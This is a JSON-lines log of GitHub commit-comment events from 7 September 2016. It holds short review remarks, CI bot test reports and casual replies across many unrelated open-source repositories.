{"id":"4527261359","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"Fsu0413/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":18927353,"position":7,"line":7,"path":"gamelogiclib/src/cardface.cpp","commit_id":"2bdb2872fb98efc66043abaeffa466aa1c3c1a56","created_at":"2016-09-07T12:20:29Z","updated_at":"2016-09-07T12:20:29Z","body":"m_可以干掉"}},"created_at":"2016-09-07T12:20:29Z"}
{"id":"4527261399","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18927354,"position":null,"line":null,"path":null,"commit_id":"63c4c0469a30c9429aabe5edd32e107d6c85456e","created_at":"2016-09-07T12:20:29Z","updated_at":"2016-09-07T12:20:29Z","body":"Agreed."}},"created_at":"2016-09-07T12:20:29Z"}
{"id":"4527262166","type":"CommitCommentEvent","actor":{"login":"RubenVerborgh"},"repo":{"name":"StatelessCat/mwe-n3js"},"payload":{"comment":{"id":18927356,"position":5,"line":20,"path":"package.json","commit_id":"def5ea3dd4a5fd66e92d1939431c5cbb0db0d8cb","created_at":"2016-09-07T12:20:39Z","updated_at":"2016-09-07T12:20:39Z","body":"You can make that `\"0.6.1\"` :wink:"}},"created_at":"2016-09-07T12:20:39Z"}
{"id":"4527262800","type":"CommitCommentEvent","actor":{"login":"ikhoon"},"repo":{"name":"scala/scala"},"payload":{"comment":{"id":18927359,"position":null,"line":null,"path":null,"commit_id":"d373130111dcbe55d98f1c6b42f90cb53ebb818b","created_at":"2016-09-07T12:20:46Z","updated_at":"2016-09-07T12:20:46Z","body":"👍"}},"created_at":"2016-09-07T12:20:46Z"}
{"id":"4527263799","type":"CommitCommentEvent","actor":{"login":"aerfasadulislam"},"repo":{"name":"git-for-windows/git-for-windows.github.io"},"payload":{"comment":{"id":18927365,"position":9,"line":16,"path":"index.html","commit_id":"6436a6831e1a77a9d6be53c3b401d553ca304a62","created_at":"2016-09-07T12:20:59Z","updated_at":"2016-09-07T12:20:59Z","body":" \"http://indianvisa-bangladesh.nic.in/visa/Appoinment_Loging.js\""}},"created_at":"2016-09-07T12:20:59Z"}
{"id":"4527263835","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18927367,"position":null,"line":null,"path":null,"commit_id":"a6e357ce9fbf29353c3938231d67cbd19243d7be","created_at":"2016-09-07T12:20:59Z","updated_at":"2016-09-07T12:20:59Z","body":"Sure, no problem"}},"created_at":"2016-09-07T12:20:59Z"}
{"id":"4527264640","type":"CommitCommentEvent","actor":{"login":"GasmanVN"},"repo":{"name":"mtadayz/MTADayZ"},"payload":{"comment":{"id":18927370,"position":null,"line":null,"path":null,"commit_id":"f5470ce43314a9f0b1b605ade7a38c330d5b4f80","created_at":"2016-09-07T12:21:12Z","updated_at":"2016-09-07T12:21:12Z","body":"Perfect . Thank You."}},"created_at":"2016-09-07T12:21:12Z"}
{"id":"4527267369","type":"CommitCommentEvent","actor":{"login":"jeznet"},"repo":{"name":"stefan-kolb/rack-stream"},"payload":{"comment":{"id":18927373,"position":null,"line":null,"path":null,"commit_id":"4c3b2a6e64b5e2dc00828fcd662de258ef279f9f","created_at":"2016-09-07T12:21:44Z","updated_at":"2016-09-07T12:21:44Z","body":":+1: \r\nCould your request a pull?"}},"created_at":"2016-09-07T12:21:44Z"}
{"id":"4527269895","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18927381,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T12:22:15Z","updated_at":"2016-09-07T12:22:15Z","body":"![Szeptember 7. - Szerda](http://ujlipot.vakvarju.com/data/napimenu/22.jpg?v=1473152574)\nErdei gombakrémleves\r\nMustáros sertéstarja újhagymás törtburgonyával\r\nMeggyes-mákos házi rétes"}},"created_at":"2016-09-07T12:22:15Z"}
{"id":"4527276844","type":"CommitCommentEvent","actor":{"login":"ucs483290"},"repo":{"name":"ucs483290/Spoon-Knife"},"payload":{"comment":{"id":18927391,"position":null,"line":null,"path":null,"commit_id":"d0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9","created_at":"2016-09-07T12:23:39Z","updated_at":"2016-09-07T12:23:39Z","body":"Erica fork test first time.  "}},"created_at":"2016-09-07T12:23:39Z"}
{"id":"4527280051","type":"CommitCommentEvent","actor":{"login":"CAPT"},"repo":{"name":"CAPT/codetest-858a837"},"payload":{"comment":{"id":18927398,"position":62,"line":62,"path":"README.md","commit_id":"c9aa4bc9f61a7e52835dac655fd3851ed4cc5486","created_at":"2016-09-07T12:24:18Z","updated_at":"2016-09-07T12:24:18Z","body":"11"}},"created_at":"2016-09-07T12:24:18Z"}
{"id":"4527281344","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18927400,"position":8,"line":145,"path":"README.adoc","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T12:24:33Z","updated_at":"2016-09-07T12:24:33Z","body":"I'm wary of continuing this conversation in the interests of time (and reviewing plugin guide), but I thought the dotted notation is idiomatic for single properties/methods. Is that not the case?\r\n\r\nAnd :+1: for the link to the user manual."}},"created_at":"2016-09-07T12:24:33Z"}
{"id":"4527282298","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18927410,"position":5,"line":27,"path":"build.gradle","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T12:24:44Z","updated_at":"2016-09-07T12:24:44Z","body":"Agreed."}},"created_at":"2016-09-07T12:24:44Z"}
{"id":"4527285288","type":"CommitCommentEvent","actor":{"login":"seasonFox"},"repo":{"name":"seasonFox/CXCProjects1"},"payload":{"comment":{"id":18927420,"position":79,"line":79,"path":".gitignore","commit_id":"f48d650b5dcd0211687780612590026ba73e8a5a","created_at":"2016-09-07T12:25:19Z","updated_at":"2016-09-07T12:25:19Z","body":"+#standard\r\n+*.7z"}},"created_at":"2016-09-07T12:25:19Z"}
{"id":"4527285634","type":"CommitCommentEvent","actor":{"login":"dzedro"},"repo":{"name":"os-autoinst/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":18927421,"position":38,"line":54,"path":"tests/installation/first_boot.pm","commit_id":"8b05d1cbf76988e09cf59551e5ed9e45f16e81a4","created_at":"2016-09-07T12:25:23Z","updated_at":"2016-09-07T12:25:23Z","body":"Why is this here ? https://openqa.suse.de/tests/541142"}},"created_at":"2016-09-07T12:25:23Z"}
{"id":"4527286258","type":"CommitCommentEvent","actor":{"login":"seasonFox"},"repo":{"name":"seasonFox/CXCProjects1"},"payload":{"comment":{"id":18927422,"position":79,"line":79,"path":".gitignore","commit_id":"f48d650b5dcd0211687780612590026ba73e8a5a","created_at":"2016-09-07T12:25:30Z","updated_at":"2016-09-07T12:25:30Z","body":"none"}},"created_at":"2016-09-07T12:25:30Z"}
{"id":"4527287342","type":"CommitCommentEvent","actor":{"login":"joywelt"},"repo":{"name":"joywelt/ExoPlayer"},"payload":{"comment":{"id":18927424,"position":null,"line":null,"path":null,"commit_id":"d4cf3118cad32adc605e8a128d9db54327918fc2","created_at":"2016-09-07T12:25:41Z","updated_at":"2016-09-07T12:25:41Z","body":"Removed all the control interfaces from GUI as well"}},"created_at":"2016-09-07T12:25:41Z"}
{"id":"4527287878","type":"CommitCommentEvent","actor":{"login":"hugsy"},"repo":{"name":"hugsy/gef"},"payload":{"comment":{"id":18927426,"position":16,"line":6096,"path":"gef.py","commit_id":"f2575f42551359b9424748f1ef850e1dba4c9f3a","created_at":"2016-09-07T12:25:48Z","updated_at":"2016-09-07T12:25:48Z","body":"I know, I just find it more explicit this way."}},"created_at":"2016-09-07T12:25:48Z"}
{"id":"4527289277","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18927430,"position":null,"line":null,"path":null,"commit_id":"feb39d673421d4e80369cff9c3112a25b09eb5df","created_at":"2016-09-07T12:26:04Z","updated_at":"2016-09-07T12:26:04Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-MacOS-10.9-clang: OK (2325 of 2328 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T12:26:04Z"}
{"id":"4527298316","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18927446,"position":10,"line":8,"path":"README.adoc","commit_id":"0fbe0eff761a43784f6d49c928179bb4a3689312","created_at":"2016-09-07T12:27:54Z","updated_at":"2016-09-07T12:27:54Z","body":"The first point is tricky. Perhaps we should then point out that classes go in a directory matching the package? It's just a question of drawing boundaries. In the case of links, I'm happy to err on the side of trying to be helpful since, as you say, it's not a big imposition on the core audience of Java developers."}},"created_at":"2016-09-07T12:27:54Z"}
{"id":"4527300289","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18927454,"position":8,"line":145,"path":"README.adoc","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T12:28:17Z","updated_at":"2016-09-07T12:28:17Z","body":"> I'm wary of continuing this conversation in the interests of time (and reviewing plugin guide), \r\n\r\nAgreed, I think we're in good enough shape now to table this here.\r\n\r\n> but I thought the dotted notation is idiomatic for single properties/methods. Is that not the case?\r\n\r\nPerhaps, I guess the fact that I don't know suggests that if it is an idiom it's not a very strong one. I do use that syntax myself from time to time, usually when I'm in \"polishing\" mode, trying to tighten up a build script, but when I'm in \"writing\" mode, I think I always use the braces syntax first—probably because I don't yet know whether I'm going to be able to \"get away\" with the dotted notation."}},"created_at":"2016-09-07T12:28:17Z"}
{"id":"4527300532","type":"CommitCommentEvent","actor":{"login":"stefan-kolb"},"repo":{"name":"stefan-kolb/rack-stream"},"payload":{"comment":{"id":18927455,"position":null,"line":null,"path":null,"commit_id":"4c3b2a6e64b5e2dc00828fcd662de258ef279f9f","created_at":"2016-09-07T12:28:20Z","updated_at":"2016-09-07T12:28:20Z","body":"The problem is that the project seems to be unmaintained..."}},"created_at":"2016-09-07T12:28:20Z"}
{"id":"4527301252","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18927457,"position":null,"line":null,"path":null,"commit_id":"feb39d673421d4e80369cff9c3112a25b09eb5df","created_at":"2016-09-07T12:28:29Z","updated_at":"2016-09-07T12:28:29Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.99%25-green.svg)</a>\n"}},"created_at":"2016-09-07T12:28:29Z"}
{"id":"4527303199","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18927465,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T12:28:53Z","updated_at":"2016-09-07T12:28:53Z","body":"![Szeptember 7. - Szerda](http://ujlipot.vakvarju.com/data/napimenu/22.jpg?v=1473152574)\nErdei gombakrémleves\r\nMustáros sertéstarja újhagymás törtburgonyával\r\nMeggyes-mákos házi rétes"}},"created_at":"2016-09-07T12:28:53Z"}
{"id":"4527307564","type":"CommitCommentEvent","actor":{"login":"mbaumga"},"repo":{"name":"tecff/gluon"},"payload":{"comment":{"id":18927471,"position":null,"line":null,"path":null,"commit_id":"406b032405148a82212d08de4e5070f603b2b5f2","created_at":"2016-09-07T12:29:45Z","updated_at":"2016-09-07T12:29:45Z","body":"Maplink evtl?\r\nUnd \"any Place\" -> \"your location\""}},"created_at":"2016-09-07T12:29:45Z"}
{"id":"4527308686","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18927472,"position":10,"line":8,"path":"README.adoc","commit_id":"0fbe0eff761a43784f6d49c928179bb4a3689312","created_at":"2016-09-07T12:29:58Z","updated_at":"2016-09-07T12:29:58Z","body":"> The first point is tricky. Perhaps we should then point out that classes go in a directory matching the package? It's just a question of drawing boundaries.\r\n\r\nAgreed all around, and it's a judgement call when to add these. Let's just feel it out over the next few guides and see if some best practices / stronger intuitions emerge.\r\n\r\n> In the case of links, I'm happy to err on the side of trying to be helpful since, as you say, it's not a big imposition on the core audience of Java developers.\r\n\r\nGreat, thanks.\r\n\r\n"}},"created_at":"2016-09-07T12:29:58Z"}
{"id":"4527316601","type":"CommitCommentEvent","actor":{"login":"mbaumga"},"repo":{"name":"tecff/gluon"},"payload":{"comment":{"id":18927485,"position":null,"line":null,"path":null,"commit_id":"5b84fc76e8eaa0207e07864f3008299905682e05","created_at":"2016-09-07T12:31:37Z","updated_at":"2016-09-07T12:31:37Z","body":"Perfect!"}},"created_at":"2016-09-07T12:31:37Z"}
{"id":"4527317293","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18927486,"position":null,"line":null,"path":null,"commit_id":"fab1732c570e294063f71bd05a3dc28fabe2c0b0","created_at":"2016-09-07T12:31:45Z","updated_at":"2016-09-07T12:31:45Z","body":"Ah, I wondered why you kept doing that. I was like \"why should I see that issue? What relevance does it have?\" Bit confused I was. I'd prefer an alternate wording, such as \"Part of story gradle/build-tool-web#12\". I think it's important to distinguish between normal issues and story cards in the commit messages."}},"created_at":"2016-09-07T12:31:45Z"}
{"id":"4527318525","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"Dragios/Citra"},"payload":{"comment":{"id":18927489,"position":null,"line":null,"path":null,"commit_id":"0c633b13fe7909a05b6e34182fd8ce970e3ca636","created_at":"2016-09-07T12:32:00Z","updated_at":"2016-09-07T12:32:00Z","body":"Did not expect you to check my codings haha. Was just playing around with the codes.\r\nThanks for highlighting it to me."}},"created_at":"2016-09-07T12:32:00Z"}
{"id":"4527318948","type":"CommitCommentEvent","actor":{"login":"marksantcroos"},"repo":{"name":"radical-cybertools/radical.pilot"},"payload":{"comment":{"id":18927492,"position":null,"line":null,"path":null,"commit_id":"c24a7cc0814b5c47f3b334cf38c609cc4e1c2d6f","created_at":"2016-09-07T12:32:05Z","updated_at":"2016-09-07T12:32:05Z","body":"I had to \"fix\" the same issue, but fixed it by catching the exception. I'm tempted to say this behavior is up to the caller."}},"created_at":"2016-09-07T12:32:05Z"}
{"id":"4527330007","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18927507,"position":null,"line":null,"path":null,"commit_id":"4b8c34e67d1dd44279b9049c628ddbd9e4aa4ac3","created_at":"2016-09-07T12:34:24Z","updated_at":"2016-09-07T12:34:24Z","body":"form-group seems OK for me. It's a form group in reality :)"}},"created_at":"2016-09-07T12:34:24Z"}
{"id":"4527331934","type":"CommitCommentEvent","actor":{"login":"joakimrj"},"repo":{"name":"joakimrj/WEB1100V"},"payload":{"comment":{"id":18927513,"position":null,"line":null,"path":null,"commit_id":"a8f7030e352b8dd354dbf16f6f32753316b3fb14","created_at":"2016-09-07T12:34:47Z","updated_at":"2016-09-07T12:34:47Z","body":"Oppgave1 CSS"}},"created_at":"2016-09-07T12:34:47Z"}
{"id":"4527333075","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18927517,"position":null,"line":null,"path":null,"commit_id":"fab1732c570e294063f71bd05a3dc28fabe2c0b0","created_at":"2016-09-07T12:35:01Z","updated_at":"2016-09-07T12:35:01Z","body":"I'll think about this and suggest something more formally. I've followed a few different patterns in the past. Now that we're seeing how these reviews and comments are shaping up in practice, we can probably start to settle on something a bit clearer."}},"created_at":"2016-09-07T12:35:01Z"}
{"id":"4527334630","type":"CommitCommentEvent","actor":{"login":"chadrick-kwag"},"repo":{"name":"AKA-Intelligence/musio_arduino"},"payload":{"comment":{"id":18927520,"position":214,"line":168,"path":"apard_p0.ino","commit_id":"97312bdfabe93bfbe8ab829d23fd6e43c07cb008","created_at":"2016-09-07T12:35:21Z","updated_at":"2016-09-07T12:35:21Z","body":"length of data passed on as parameter not indicated explicitly"}},"created_at":"2016-09-07T12:35:21Z"}
{"id":"4527337887","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/jodconverter"},"payload":{"comment":{"id":18927523,"position":null,"line":null,"path":null,"commit_id":"5a02e1d4054836347fadee7f43cf44e5bb4ed9a3","created_at":"2016-09-07T12:36:00Z","updated_at":"2016-09-07T12:36:00Z","body":"BTW would be nice to have a proper README similar to the others (http://contrib.xwiki.org/xwiki/bin/view/Main/WebHome#HREADME.mdTemplate)"}},"created_at":"2016-09-07T12:36:00Z"}
{"id":"4527341343","type":"CommitCommentEvent","actor":{"login":"chadrick-kwag"},"repo":{"name":"AKA-Intelligence/musio_arduino"},"payload":{"comment":{"id":18927532,"position":218,"line":172,"path":"apard_p0.ino","commit_id":"97312bdfabe93bfbe8ab829d23fd6e43c07cb008","created_at":"2016-09-07T12:36:43Z","updated_at":"2016-09-07T12:36:43Z","body":"here the length of data passed is calculated. however, this may be prone to error since rxbuf may not be holding a single CMD packet but or more. To account for this, i think passing the length of data explicitly as a parameter is a more versatile method."}},"created_at":"2016-09-07T12:36:43Z"}
{"id":"4527343661","type":"CommitCommentEvent","actor":{"login":"jcormier"},"repo":{"name":"sameersbn/docker-redmine"},"payload":{"comment":{"id":18927539,"position":24,"line":15,"path":"docker-compose.yml","commit_id":"c436a9c650950fb0cea6977339ff2decc780a858","created_at":"2016-09-07T12:37:12Z","updated_at":"2016-09-07T12:37:12Z","body":"Ahh interesting, thanks for the update."}},"created_at":"2016-09-07T12:37:12Z"}
{"id":"4527344906","type":"CommitCommentEvent","actor":{"login":"Fastjur"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":18927546,"position":34,"line":33,"path":"src/main/java/net/liquidpineapple/pang/objects/ball.java","commit_id":"46f5631ee4c0ee4f496c3f40c8fcd02a5efbf098","created_at":"2016-09-07T12:37:25Z","updated_at":"2016-09-07T12:37:25Z","body":"Also pleas convert these string to [enum](https://docs.oracle.com/javase/tutorial/java/javaOO/enum.html)"}},"created_at":"2016-09-07T12:37:25Z"}
{"id":"4527356025","type":"CommitCommentEvent","actor":{"login":"paulolieuthier"},"repo":{"name":"paulolieuthier/MiniAds"},"payload":{"comment":{"id":18927572,"position":null,"line":null,"path":null,"commit_id":"d3b9fc9bdd0c3ba98bddfa0114964a71dd18990f","created_at":"2016-09-07T12:39:40Z","updated_at":"2016-09-07T12:39:40Z","body":"Verdade! Passou batido. Corrigido aqui: afa583c86a333122356bc0640306cd757cb5c681."}},"created_at":"2016-09-07T12:39:40Z"}
{"id":"4527359467","type":"CommitCommentEvent","actor":{"login":"paulolieuthier"},"repo":{"name":"paulolieuthier/MiniAds"},"payload":{"comment":{"id":18927587,"position":null,"line":null,"path":null,"commit_id":"b04a034a2777e05d346e8124891492b261b73342","created_at":"2016-09-07T12:40:23Z","updated_at":"2016-09-07T12:40:23Z","body":"Valeu, jovem! Software livre FTW! 😄 "}},"created_at":"2016-09-07T12:40:23Z"}
{"id":"4527360203","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":18927588,"position":null,"line":null,"path":null,"commit_id":"371402d84ed4bc6e8e4ffdd43a3dd92ab9598327","created_at":"2016-09-07T12:40:32Z","updated_at":"2016-09-07T12:40:32Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;8i1JGSqX&#x2F;1981-bug-988038-doc-mention-that-you-can-t-mix-crowbar-and-ceph-deploy\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug 988038 - doc: mention that you can&#39;t mix crowbar and ceph-deploy</a>"}},"created_at":"2016-09-07T12:40:32Z"}
{"id":"4527361943","type":"CommitCommentEvent","actor":{"login":"danield-hyprbrands"},"repo":{"name":"Tivix/django-rest-auth"},"payload":{"comment":{"id":18927595,"position":null,"line":null,"path":null,"commit_id":"2a0fa1ab4eff07b5ec5169b7fe98a0f2c97a3e94","created_at":"2016-09-07T12:40:53Z","updated_at":"2016-09-07T12:40:53Z","body":"This causes a constraint, and forces me to add rates for the scope when using `ScopedRateThrottle`,\r\nor, change the default `scope_attr`.\r\nSince the general use case would be not set rates but do use the scoped rate class, IMHO, would have been better to use `throttle_classes`, which be a little less enforcing."}},"created_at":"2016-09-07T12:40:53Z"}
{"id":"4527363469","type":"CommitCommentEvent","actor":{"login":"akhachaturan"},"repo":{"name":"akhachaturan/test_code_collab"},"payload":{"comment":{"id":18927600,"position":null,"line":null,"path":null,"commit_id":"80ce143b61ff746233d537f8933fef0d9c782f98","created_at":"2016-09-07T12:41:13Z","updated_at":"2016-09-07T12:41:13Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://10.6.241.144:8080/ui/ui#review:id=3)"}},"created_at":"2016-09-07T12:41:13Z"}
{"id":"4527367255","type":"CommitCommentEvent","actor":{"login":"Fr3ddy7"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18927609,"position":null,"line":null,"path":null,"commit_id":"7afa3a2effe327e26bb00fa7d412b7dc7b8765b8","created_at":"2016-09-07T12:41:57Z","updated_at":"2016-09-07T12:41:57Z","body":"#163"}},"created_at":"2016-09-07T12:41:57Z"}
{"id":"4527369667","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18927613,"position":null,"line":null,"path":null,"commit_id":"1bcfdefde8db5ec2edfb3e141ecc0dc8ad5d081f","created_at":"2016-09-07T12:42:28Z","updated_at":"2016-09-07T12:42:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 957](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12868&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T12:42:28Z"}
{"id":"4527369912","type":"CommitCommentEvent","actor":{"login":"Komzpa"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18927616,"position":4,"line":250,"path":"src/app/qgsoptions.cpp","commit_id":"aa256b8c33343e834aae0755950ab891007b483c","created_at":"2016-09-07T12:42:30Z","updated_at":"2016-09-07T12:42:30Z","body":"throttling regex was updated on tile.osm.org: https://git.openstreetmap.org/chef.git/commitdiff/e3cf43a"}},"created_at":"2016-09-07T12:42:30Z"}
{"id":"4527371508","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18927622,"position":null,"line":null,"path":null,"commit_id":"4b8c34e67d1dd44279b9049c628ddbd9e4aa4ac3","created_at":"2016-09-07T12:42:49Z","updated_at":"2016-09-07T12:42:49Z","body":"ok, that's the kind of thing that Mazi and Tammo should test. "}},"created_at":"2016-09-07T12:42:49Z"}
{"id":"4527376569","type":"CommitCommentEvent","actor":{"login":"RobFog"},"repo":{"name":"HandBrake/HandBrake"},"payload":{"comment":{"id":18927638,"position":null,"line":null,"path":null,"commit_id":"d9f444f9210ce7856f7d052388c52fd397f29f75","created_at":"2016-09-07T12:43:50Z","updated_at":"2016-09-07T12:43:50Z","body":"Neat!"}},"created_at":"2016-09-07T12:43:50Z"}
{"id":"4527380212","type":"CommitCommentEvent","actor":{"login":"jubianchi"},"repo":{"name":"shulard/atoum-xml-extension"},"payload":{"comment":{"id":18927646,"position":11,"line":110,"path":"classes/asserters/nodes.php","commit_id":"ef0c35c6091aa6f85b27d1bb1ca7e6182f9aafbf","created_at":"2016-09-07T12:44:34Z","updated_at":"2016-09-07T12:44:34Z","body":"you could add a `case` in the `switch` in `__get` to allow calling `parent` without parenthesis ;)"}},"created_at":"2016-09-07T12:44:34Z"}
{"id":"4527381860","type":"CommitCommentEvent","actor":{"login":"arnestig"},"repo":{"name":"arnestig/odin"},"payload":{"comment":{"id":18927651,"position":null,"line":null,"path":null,"commit_id":"1b908a892706ec9531bb2cff4290c61b8346f087","created_at":"2016-09-07T12:44:54Z","updated_at":"2016-09-07T12:44:54Z","body":"Looks like this somehow screwed up \"steal not seen\" functionality. doesn't work anymore from what I can see"}},"created_at":"2016-09-07T12:44:54Z"}
{"id":"4527389285","type":"CommitCommentEvent","actor":{"login":"mnagaku"},"repo":{"name":"mnagaku/fullbok"},"payload":{"comment":{"id":18927670,"position":null,"line":null,"path":null,"commit_id":"2a3a770f9ba4ee9a58a9a94f699122dd48fa294d","created_at":"2016-09-07T12:46:21Z","updated_at":"2016-09-07T12:46:21Z","body":"fullbok-demo.templateには手を入れていないので、動作しないと思います。\r\n\r\nfullbok.templateでは、slaveに使うamiを、awslinuxベースのものから、自前のCentOSベースのものに変更しており、amiを公開設定していないことで、slaveのインスタンスを作れない状態になっているかと思われます。自前amiについては、中身が精査できていないため、すぐに公開できるという状態ではない感じです。"}},"created_at":"2016-09-07T12:46:21Z"}
{"id":"4527394571","type":"CommitCommentEvent","actor":{"login":"detonin"},"repo":{"name":"uclouvain/openjpeg"},"payload":{"comment":{"id":18927683,"position":null,"line":null,"path":null,"commit_id":"734d57d5f7842aa7c2c9f36d62131ab4d8bd6c87","created_at":"2016-09-07T12:47:24Z","updated_at":"2016-09-07T12:47:24Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;XQ3VcQqw&#x2F;4-talos-security-advisory-for-openjpeg\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Talos Security Advisory for OpenJPEG</a>"}},"created_at":"2016-09-07T12:47:24Z"}
{"id":"4527397200","type":"CommitCommentEvent","actor":{"login":"Fr3ddy7"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18927685,"position":null,"line":null,"path":null,"commit_id":"d0f3ab58f784c73eedbf5d2eb6133a07018165e2","created_at":"2016-09-07T12:47:57Z","updated_at":"2016-09-07T12:47:57Z","body":"probably should go back :)"}},"created_at":"2016-09-07T12:47:57Z"}
{"id":"4527398115","type":"CommitCommentEvent","actor":{"login":"JacobStoren"},"repo":{"name":"OPM/ResInsight"},"payload":{"comment":{"id":18927691,"position":null,"line":null,"path":null,"commit_id":"8c67ee0a0d48325843d74243f0f1d2029c21689a","created_at":"2016-09-07T12:48:09Z","updated_at":"2016-09-07T12:48:09Z","body":"Now I believe this is fixed by 1209c908e58ebe82147e358ca83c3f3f96b30290"}},"created_at":"2016-09-07T12:48:09Z"}
{"id":"4527401123","type":"CommitCommentEvent","actor":{"login":"msarahan"},"repo":{"name":"conda-forge/pandas-feedstock"},"payload":{"comment":{"id":18927695,"position":null,"line":null,"path":null,"commit_id":"3545dd1e22bd50e95fd4ec90da8a86f52883bce6","created_at":"2016-09-07T12:48:42Z","updated_at":"2016-09-07T12:48:42Z","body":"Jeff, please avoid committing directly to repos. PRs serve an important purpose of notifying the team of changes, even when those changes don't need to go through ci (like this one). "}},"created_at":"2016-09-07T12:48:42Z"}
